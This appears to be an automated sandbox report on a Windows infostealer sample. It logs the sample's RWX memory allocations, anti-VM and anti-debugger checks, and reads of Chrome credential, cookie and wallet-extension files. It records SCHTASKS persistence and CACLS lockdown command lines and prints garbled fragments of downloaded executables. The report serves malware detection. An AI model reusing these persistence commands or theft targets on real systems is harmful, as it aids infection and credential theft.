NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b03000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c6f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b04000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b05000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b06000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b07000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b08000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b0f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0047d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c64000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2660 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006a1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2852 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000009d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2852 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2f61000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 31, 2023, 5:46 p.m.	process_identifier: 2852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef35fb000 process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW May 31, 2023, 5:47 p.m.	total_number_of_free_bytes: 0 free_bytes_available: 9920368640 root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer total_number_of_bytes: 0	1	1	0

Steals private information from local Internet browsers (8 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckpaelocniggkheibcacecnmmlmeodfa
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe
file	C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "npsvga64.exe" /P "test22:N"&&CACLS "npsvga64.exe" /P "test22:R" /E&&echo Y\|CACLS "..\6bb5824ec4" /P "test22:N"&&CACLS "..\6bb5824ec4" /P "test22:R" /E&&Exit

Drops a binary and executes it (3 events)

file	C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe
file	C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe
file	C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe
file	C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW May 31, 2023, 5:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe	1	1
ShellExecuteExW May 31, 2023, 5:46 p.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN npsvga64.exe /TR "C:\Users\test22\AppData\Local\Temp\6bb5824ec4\npsvga64.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW May 31, 2023, 5:46 p.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "npsvga64.exe" /P "test22:N"&&CACLS "npsvga64.exe" /P "test22:R" /E&&echo Y\|CACLS "..\6bb5824ec4" /P "test22:N"&&CACLS "..\6bb5824ec4" /P "test22:R" /E&&Exit filepath: cmd	1	1
ShellExecuteExW May 31, 2023, 5:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe parameters: filepath: C:\Users\test22\AppData\Roaming\1000219050\unsecapp.exe	1	1
ShellExecuteExW May 31, 2023, 5:46 p.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe parameters: filepath: C:\Users\test22\AppData\Roaming\1000223050\tcpupdate.exe	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses May 31, 2023, 5:46 p.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process npsvga64.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile May 31, 2023, 5:46 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL Átdàþn @ `& @W Üx@ H.textxý þ `.rsrc @@.reloc@@BPHì( t[x60(@(p*0 +^(:t0%¢ ½$^(:&0 Ç5^(:&.+¿Á( 0 J^(:&.+À¬( 0 ^(:&0 ±^(:&0 '^(:&0 Y^(:&0%¢ »e^(:t0;%¢ e^( o Ð( o ( (:t00 ]e^( o Ð( o ( (:t0 d^(:t 0?%¢%¢ Ûd^( o Ð( o ( (:t0@%¢ Ô{^( o Ð( o ( (:t0 {^(:t0 7{^(:&0{{o +0Öþ þþ Ùéô \|æaf;cþ Å¤;ße ¥¤;ßafYErBrZr8m âH Ûõ#êae ÷këa* )Sö ß?éY ÖlëY jXÞa* {î[ ºáËÜY óoØX* xäF÷ rýa c ¼Y* ça÷ñ îÁÃãX PåX Þö@a* ïD æµaf ö`àYfR( s } 0l{ o ,++:H+ E.!(% +Þ,# +Ö(% +Ê{þ +»++-F+E+(%+â%{ jX} +Î{ +Â8·{,++:+ E%+:!(% +Þ{o o +Ä +¾,"(% +¯++-?+E'(%+â%{ jX} +Î +Æ+ + 0+E.6!(%+Þ ôþ+Ð{ X} +»,+³++-} ({ o þ ,++-P+E5!(%+Þ+Øs +Ì{ o (%+´o(,++:£+E6(%+Þ,"(%+Ï{þ+¿}+³++-s }{o o + E!(% +â +Ü +Ö+ }0+E$9(%+Þ{ o +Í,+Å{þ!(%+°++:÷{o 8¾( +E"(7!(%+Þ{ {þ+Ç+Á,"(%+²++-{ {o &+E+ E .(% +â%{jX} +Íj} +¿( ,++:.ÿÿÿÞþo Ül#4@Z#Y@[( èþ,++- ès }{ o o 8´( +E2!(%+Þ ,&+Õ+Ï{o þþ +·++-8g{jþ ,++-+8{jþ,++-{ }{o ( ,++:8ÿÿÿÞþo ÜmÙFÏ\|B( }0{ +0{ +^( }}*0G {þ,++:+'E 6Rav"(%+Îþ +Â ,g+¹{o }+£{o oÌ (%+};8xÿÿÿ{u%8cÿÿÿ8Zÿÿÿ++- o }{o i} ,{ o ¢ X iþ,++-Ñ+8{(Ü}{(Ü}{(Þ} oE,++-{ 8+E1?N!(%+Ú{þ +É{iX +´{¢+¦ ,(%+++-{{i(! oË{{($+7E)@L\u~"(%+¾(" +³+¬o# + oCo$ #(%+ 8}ÿÿÿ o% 8mÿÿÿ{4(Ü8Tÿÿÿ8Kÿÿÿ8Bÿÿÿ,86ÿÿÿ8-ÿÿÿX{4iþ,++-Â o& o' s( s) {<ot{5þ,++:+'E &,BO request_handle: 0x00cc000c	1	1	0
InternetReadFile May 31, 2023, 5:46 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd#udð"0ü @ I"` ~H6 H.textû ü `.rsrc þ@@HAtÙ5Øk¸Õ0(k(*0-8 8Ð8© ^(Va 8õ _(Va8 <(Va8h `(Va 8ô_(Va8a(Va8üc(Va8Ìd(Va80c(Va8È e(Va 8 c(Va 8ûf(Va8g(Va8. e(Va 8ïh(Va8©>(Va8Di(Va8h(Va8Õk(Va8c(Va8Fi(Va8i(Va8Êh(Va8l(Va8am(Va8f(Va8Òg(Va8§l(Va8ic(Va8^(Va8Úf(Va8i(Va8t !(Va +B!h(Va!+"m(Va8\ "iY8 /(V"+Ü!cY80"+Ì"(V8j1"+º+ª ^X8-;!+a(@8:!+8uÿÿÿY(@8À 8`ÿÿÿ_X8LÆ 8Mÿÿÿ87ÿÿÿ\(@8Â8"ÿÿÿfX8ÎÀ8ÿÿÿ8ùþÿÿ"(V8ô8äþÿÿ`Y8Zò8Ñþÿÿ8»þÿÿ`Y8=8¨þÿÿn(V8×>8þÿÿ8}þÿÿ\X8<8jþÿÿ](@8S?8Uþÿÿ8?þÿÿ\(@8Æ8þÿÿYX8ÂÄ8þÿÿ8þÿÿ((V8ò8ìýÿÿYY8Mü8Ùýÿÿ8Ãýÿÿ_X8ú28°ýÿÿe(@8½38ýÿÿ8ýÿÿhX8wø8rýÿÿZ(@8:ù8]ýÿÿ8Gýÿÿg(@8ú82ýÿÿ[X8Åø8ýÿÿ8 ýÿÿ\Y8qù8öüÿÿ"(V84ø8áüÿÿ8Ëüÿÿ`(-8ü?8¶üÿÿaX8³=8£üÿÿ8üÿÿdX8lÁ8züÿÿ_(-8/À8eüÿÿ8Oüÿÿ\X8êÀ8<üÿÿa(@Ã8üÿÿ8üÿÿcYE 2QÆ8õûÿÿj(VÅ8ãûÿÿ8ÍûÿÿC(V:8»ûÿÿfYE,><8ûÿÿ8ûÿÿ`YE=f8hûÿÿ (V 8Vûÿÿ8@ûÿÿjYE6P8"ûÿÿ0(V+E%ÿÿÿDÿÿÿVÿÿÿ8ÿÿÿ8ùúÿÿ8ãúÿÿ(V +8Êþÿÿ38Éúÿÿ eYE&Ov+E¦þÿÿ¹þÿÿËþÿÿ8~þÿÿ58úÿÿ8\|úÿÿh(@+EJþÿÿ]þÿÿrþÿÿ87þÿÿ 8SúÿÿZXE0g+8ýýÿÿ 8,úÿÿ8úÿÿ(V+8Åýÿÿó8üùÿÿjYE&\v+E¡ýÿÿ¶ýÿÿÉýÿÿ8yýÿÿý8Åùÿÿ8¯ùÿÿ eXE?Z+E8ýÿÿKýÿÿ`ýÿÿ8%ýÿÿ8yùÿÿ_(- +8øüÿÿ8_ùÿÿ8Iùÿÿ`(- +8¿üÿÿÀ 8.ùÿÿ fXE&@v+Eüÿÿ°üÿÿÃüÿÿ8süÿÿÆ 8÷øÿÿ8áøÿÿ(V+8<üÿÿù 8Çøÿÿ\YE%[u+Eüÿÿ+üÿÿ@üÿÿ8ðûÿÿ 8øÿÿ8{øÿÿ\XE?i+E°ûÿÿÃûÿÿØûÿÿ8ûÿÿ8Eøÿÿ[(-+8pûÿÿ8+øÿÿ8øÿÿb(V+E;ûÿÿPûÿÿcûÿÿ8(ûÿÿÁ8ë÷ÿÿhYE?i+8íúÿÿÃ8Ã÷ÿÿ8÷ÿÿaXEAi+8¦úÿÿ48÷ÿÿj(-+Eúÿÿ¤úÿÿ·úÿÿ8gúÿÿ78[÷ÿÿ8E÷ÿÿZXEAw+8"úÿÿÂ8÷ÿÿc(-+Eúÿÿúÿÿ3úÿÿ8ãùÿÿÃ8óöÿÿ8Ýöÿÿ iYE?f+E£ùÿÿ¶ùÿÿËùÿÿ8ùÿÿù8§öÿÿ(V +8dùÿÿö8öÿÿ8zöÿÿ(V+E/ùÿÿDùÿÿWùÿÿ8ùÿÿ 8Söÿÿ^YE=c+8äøÿÿ 8.öÿÿ8öÿÿ0(V+E±øÿÿÆøÿÿÙøÿÿ8øÿÿ 8òõÿÿjYEh+8eøÿÿ78Ìõÿÿ8¸õÿÿdYE>U§âëôDMV+ 8÷÷ÿÿ58fõÿÿ(V +Eß÷ÿÿô÷ÿÿøÿÿ8½÷ÿÿ28>õÿÿ8õÿÿ(+!8÷ÿÿ: 8õÿÿ{ sA(K((ï(ó+E\÷ÿÿl÷ÿÿ~÷ÿÿ8=÷ÿÿ; 8Óôÿÿ4 8Êôÿÿ7 8Áôÿÿ A(K((ï(ó+Eëöÿÿûöÿÿ ÷ÿÿ8Ûöÿÿ3 8ôÿÿ9 8}ôÿÿ8 8tôÿÿ{((ó+"8öÿÿ0 8Rôÿÿ, 8Iôÿÿ{((ó+ ( 8&ôÿÿ5 8$ôÿÿ- 8ôÿÿ1 8ôÿÿ{((ó+ }8éóÿÿ2(V 8èóÿÿ*0Ó8! c(Va8µ <(Va8M o(Va8½ o(Va 8~ `(Va 8p(Va8p(Va8 @(Va 8à@(Va8Aq(Va8k(Va8©e(Va8 !(Va8Ãr(Va8p(Va859(Va8 r(Va8Ïs(Va8t(Va8Su(Va request_handle: 0x00cc000c	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00277800', u'virtual_address': u'0x00034000', u'entropy': 7.935500003712527, u'name': u':hjB\\xl9', u'virtual_size': u'0x00277785'}

entropy

7.93550000371

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x0020d400', u'virtual_address': u'0x002ad000', u'entropy': 7.976652622397812, u'name': u'Rh+KXR%k', u'virtual_size': u'0x0020d280'}

entropy

7.9766526224

description

A section with a high entropy has been found

entropy

0.934558675015

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 31, 2023, 5:46 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 31, 2023, 5:47 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (9 events)

description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 51 events)

Time & API	Arguments	Status
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000045c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: 7-Zip base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: AddressBook base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: Adobe AIR base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: Connection Manager base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: DirectDrawEx base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: EditPlus base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: Fontcore base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: Google Chrome base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: IE40 base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: IE4Data base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: IE5BAKEX base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: IEData base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: MobileOptionPack base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: Office15.PROPLUSR base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: SchedulingAgent base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: WIC base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW May 31, 2023, 5:48 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x0000045c key_handle: 0x00000460 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
